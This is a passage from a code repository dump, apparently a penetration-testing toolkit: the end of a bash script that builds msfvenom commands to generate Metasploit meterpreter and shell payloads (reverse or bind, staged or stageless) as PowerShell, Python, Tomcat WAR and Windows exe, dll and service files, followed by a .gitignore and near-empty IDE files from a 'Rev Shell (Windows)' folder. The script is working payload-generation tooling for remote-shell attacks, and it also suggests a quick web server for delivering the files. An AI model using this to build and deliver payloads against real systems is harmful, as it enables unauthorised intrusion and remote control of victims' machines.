FILEEXT="ps1" 789 | PAYLOAD="${TYPE}/${SHELL}${_STAGE}${DIRECTION}_${METHOD}" 790 | CMD="msfvenom -p ${PAYLOAD} -f ps1 \\\\\n --platform ${TYPE} -e generic/none -a x86 ${LHOST} LPORT=${PORT} \\\\\n > '${OUTPATH}${TYPE}-${SHELL}-${STAGE}-${DIRECTION}-${METHOD}-${PORT}.${FILEEXT}'" 791 | doAction "${TYPE}" "${IP}" "${PORT}" "${PAYLOAD}" "${CMD}" "${FILEEXT}" "${SHELL}" "${DIRECTION}" "${STAGE}" "${METHOD}" "${VERBOSE}" 792 | 793 | ## Python 794 | elif [[ "${TYPE}" == "python" || "${TYPE}" == "py" ]]; then 795 | [[ -z "${SHELL}" ]] \ 796 | && SHELL="meterpreter" 797 | [[ -z "${STAGE}" ]] \ 798 | && STAGE="staged" \ 799 | && _STAGE="/" 800 | # Cant do: staged shell // stageless meterpreter // stageless bind - Invalid Payload Selected 801 | if [[ "${STAGE}" == "staged" && "${SHELL}" == "shell" ]]; then 802 | echo -e " ${YELLOW}[i]${RESET} Unable to do ${STAGE} ${SHELL} Python. There ${RED}isn't a option in Metasploit to allow it${RESET}. =(" >&2 803 | elif [[ "${STAGE}" == "stageless" && "${SHELL}" == "meterpreter" ]]; then 804 | echo -e " ${YELLOW}[i]${RESET} Unable to do ${STAGE} ${SHELL} Python. There ${RED}isn't a option in Metasploit to allow it${RESET}. =(" >&2 805 | elif [[ "${STAGE}" == "stageless" && "${DIRECTION}" == "bind" ]]; then 806 | echo -e " ${YELLOW}[i]${RESET} Unable to do ${STAGE} ${DIRECTION} Python. There ${RED}isn't a option in Metasploit to allow it${RESET}. =(" >&2 807 | fi 808 | TYPE="python" 809 | FILEEXT="py" 810 | PAYLOAD="${TYPE}/${SHELL}${_STAGE}${DIRECTION}_${METHOD}" 811 | CMD="msfvenom -p ${PAYLOAD} -f raw \\\\\n --platform ${TYPE} -e generic/none -a ${TYPE} ${LHOST} LPORT=${PORT} \\\\\n > '${OUTPATH}${TYPE}-${SHELL}-${STAGE}-${DIRECTION}-${METHOD}-${PORT}.${FILEEXT}'" 812 | doAction "${TYPE}" "${IP}" "${PORT}" "${PAYLOAD}" "${CMD}" "${FILEEXT}" "${SHELL}" "${DIRECTION}" "${STAGE}" "${METHOD}" "${VERBOSE}" 813 | 814 | ## Tomcat 815 | elif [[ "${TYPE}" == "tomcat" || "${TYPE}" == "war" ]]; then 816 | [[ -z "${SHELL}" ]] \ 817 | && SHELL="meterpreter" 818 | [[ -z "${STAGE}" ]] \ 819 | && STAGE="staged" \ 820 | && _STAGE="/" 821 | # Cant do: stageless meterpreter // stageless bind // find_ports (Invalid Payload Selected) 822 | if [[ "${STAGE}" == "stageless" && "${SHELL}" == "meterpreter" ]]; then 823 | echo -e " ${YELLOW}[i]${RESET} Unable to do ${STAGE} ${SHELL} Tomcat. There ${RED}isn't a option in Metasploit to allow it${RESET}. =(" >&2 824 | elif [[ "${STAGE}" == "stageless" && "${DIRECTION}" == "bind" ]]; then 825 | echo -e " ${YELLOW}[i]${RESET} Unable to do ${DIRECTION} ${STAGE} Tomcat. There ${RED}isn't a option in Metasploit to allow it${RESET}. =(" >&2 826 | elif [[ "${METHOD}" == "find_ports" ]]; then 827 | echo -e " ${YELLOW}[i]${RESET} Unable to do ${METHOD} Tomcat. There ${RED}isn't a option in Metasploit to allow it${RESET}. =(" >&2 828 | fi 829 | TYPE="tomcat" 830 | FILEEXT="war" 831 | PAYLOAD="java/${SHELL}${_STAGE}${DIRECTION}_${METHOD}" 832 | CMD="msfvenom -p ${PAYLOAD} -f raw \\\\\n --platform java -a x86 -e generic/none ${LHOST} LPORT=${PORT} \\\\\n > '${OUTPATH}${TYPE}-${SHELL}-${STAGE}-${DIRECTION}-${METHOD}-${PORT}.${FILEEXT}'" 833 | doAction "${TYPE}" "${IP}" "${PORT}" "${PAYLOAD}" "${CMD}" "${FILEEXT}" "${SHELL}" "${DIRECTION}" "${STAGE}" "${METHOD}" "${VERBOSE}" 834 | 835 | ## Windows 836 | elif [[ "${TYPE}" == "windows" || "${TYPE}" == "win" || "${TYPE}" == "exe" || "${TYPE}" == "dll" || "${TYPE}" == "srv" ]]; then 837 | [[ -z "${SHELL}" ]] \ 838 | && SHELL="meterpreter" 839 | [[ -z "${STAGE}" ]] \ 840 | && STAGE="staged" \ 841 | && _STAGE="/" 842 | [[ "${METHOD}" == "find_port" ]] \ 843 | && METHOD="allports" 844 | # Its able todo anything that you throw at it =). 845 | FILEEXT="exe" 846 | [[ "${TYPE}" == "dll" ]] && FILEEXT="dll" 847 | [[ "${TYPE}" == "srv" ]] && FILEEXT="exe-service" 848 | TYPE="windows" 849 | PAYLOAD="${TYPE}/${SHELL}${_STAGE}${DIRECTION}_${METHOD}" 850 | CMD="msfvenom -p ${PAYLOAD} -f ${FILEEXT} \\\\\n --platform ${TYPE} -a x86 -e generic/none ${LHOST} LPORT=${PORT} \\\\\n > '${OUTPATH}${TYPE}-${SHELL}-${STAGE}-${DIRECTION}-${METHOD}-${PORT}.${FILEEXT%-service}'" 851 | doAction "${TYPE}" "${IP}" "${PORT}" "${PAYLOAD}" "${CMD}" "${FILEEXT}" "${SHELL}" "${DIRECTION}" "${STAGE}" "${METHOD}" "${VERBOSE}" 852 | 853 | ## Batch/Loop modes 854 | elif [[ "${BATCH}" == "true" || "${LOOP}" == "true" ]]; then 855 | #SUCCESS=true 856 | exit 0 857 | 858 | ## Blank input 859 | elif [[ -z "${TYPE}" ]]; then 860 | echo -e "\n ${YELLOW}[i]${RESET} ${YELLOW}Missing TYPE${RESET} or ${YELLOW}BATCH/LOOP mode${RESET}" 861 | 862 | ## Unexpected input 863 | else 864 | echo -e "\n ${YELLOW}[i]${RESET} Unknown type: ${YELLOW}${TYPE}${RESET}" >&2 865 | fi 866 | 867 | 868 | #-Done--------------------------------------------------------# 869 | 870 | 871 | ##### Done! 872 | if [[ "${SUCCESS}" == true ]]; then 873 | echo -e " ${GREEN}[?]${RESET} ${GREEN}Quick web server${RESET} (for file transfer)?: python2 -m SimpleHTTPServer 8080" 874 | echo -e " ${BLUE}[*]${RESET} ${BLUE}Done${RESET}!" 875 | else 876 | doHelp 877 | fi 878 | 879 | exit 0 880 | -------------------------------------------------------------------------------- /Payload Generators/Rev Shell (Windows)/.gitignore: -------------------------------------------------------------------------------- 1 | # Prerequisites 2 | *.d 3 | 4 | # Object files 5 | *.o 6 | *.ko 7 | *.obj 8 | *.elf 9 | 10 | # Linker output 11 | *.ilk 12 | *.map 13 | *.exp 14 | 15 | # Precompiled Headers 16 | *.gch 17 | *.pch 18 | 19 | # Libraries 20 | *.lib 21 | *.a 22 | *.la 23 | *.lo 24 | 25 | # Shared objects (inc. Windows DLLs) 26 | *.dll 27 | *.so 28 | *.so.* 29 | *.dylib 30 | 31 | # Executables 32 | *.exe 33 | *.out 34 | *.app 35 | *.i*86 36 | *.x86_64 37 | *.hex 38 | 39 | # Debug files 40 | *.dSYM/ 41 | *.su 42 | *.idb 43 | *.pdb 44 | 45 | # Kernel Module Compile Results 46 | *.mod* 47 | *.cmd 48 | .tmp_versions/ 49 | modules.order 50 | Module.symvers 51 | Mkfile.old 52 | dkms.conf 53 | 54 | # Build dir 55 | build/ 56 | 57 | #Python guff 58 | env/ -------------------------------------------------------------------------------- /Payload Generators/Rev Shell (Windows)/.idea/encodings.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | -------------------------------------------------------------------------------- /Payload Generators/Rev Shell (Windows)/.idea/misc.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | -------------------------------------------------------------------------------- /Payload Generators/Rev Shell (Windows)/.idea/modules.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | -------------------------------------------------------------------------------- /Payload Generators/Rev Shell (Windows)/.idea/rev.iml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 11 | -------------------------------------------------------------------------------- /Payload Generators/Rev Shell (Windows)/.idea/vcs.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | -------------------------------------------------------------------------------- /Payload Generators/Rev Shell (Windows)/.idea/workspace.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 11 | 12 | 13 | 14 | 15 | 16 | 17 | 18 | 19 | 20 | 21 | 22 | 23 | 24 | 25 | 26 | 27 | 28 | 29 | 30 | 31 | 32 | 33 | 34 | 35 | 36 | 37 | 38 | 39 | 40 | 41 | 42 | 43 | 44 | 45 | 46 | 47 | 48 | 49 | 50 | 51 | 52 | 53 | 54 | 55 | 56 | 57 | 58 | 59 | 60 | 61 | 62 | 63 | 64 | 65 | 66 | 67 | 68 | 69 | 70 | 71 | 72 | 73 | 74 | 75 | 76 | 77 | 78 | 79 | 80 | 81 | 82 | 83 | 84 | 85 | 86 | 87 | 88 | 89 | 90 | 91 | 92 | 93 | 94 | 95 | 96 | 97 | 98 | 99 | 100 | 101 | 102 | 103 | 104 | 105 | 106 | 107 | 108 | 113 | 114 | 115 | 117 | 118 | 130 | 131 | 132 | 137 | 138 | 139 | 140 | 141 | 142 | 143 | 144 | 145 | 146 | 147 | 148 | 149 | 150 | 151 | 152 | 153 | 154 | 155 | 156 | 157 | 158 | 159 | 160 | 161 | 162 | 163 | 164 | 165 |